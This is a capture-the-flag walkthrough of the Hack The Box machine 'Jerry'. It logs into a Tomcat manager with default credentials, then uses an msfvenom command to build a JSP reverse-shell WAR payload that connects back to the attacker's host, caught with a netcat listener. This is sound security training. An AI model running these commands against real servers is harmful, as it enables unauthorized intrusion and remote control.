Hack The Box - Jerry Walkthrough

14 Jul 2018

Scope

Tools

• nmap
• msfvenom
• netcat

Walkthrough

Let’s do a port scan to find if there are any services running.

nmap -sC -sV -oA nmap/initial -vvv 10.10.10.95 

We found Apache Tomcat with http is running on port 8080, so let’s check what is being served at 10.10.10.95:8080.

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.

If we put those credentials into the login prompt from earlier, we reach the console page.

We see a place upload a file, so let’s use msfvenom to generate a payload to get reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.251 LPORT=44 -f war > shelle0.war

Next we upload the payload and go to 10.10.10.95:8080/shelle0/

Then we use netcat to listen on port 44 get shell.

nc -l -v -p 44

With some poking around, we find some logins for Tomcat

Now if we navigate to the desktop of the Administrator account, we find the flags.

Lessons

• Never use default credentials

Resources

Here is a list of resources I used at some point while working on Jerry:

• Various unix command equivalents in Powershell
• type Powershell command
• Example of using netcat and metasploit on Tomcat
• Examples of msfvenom commands for payloads
• Reverse Shell Cheatsheet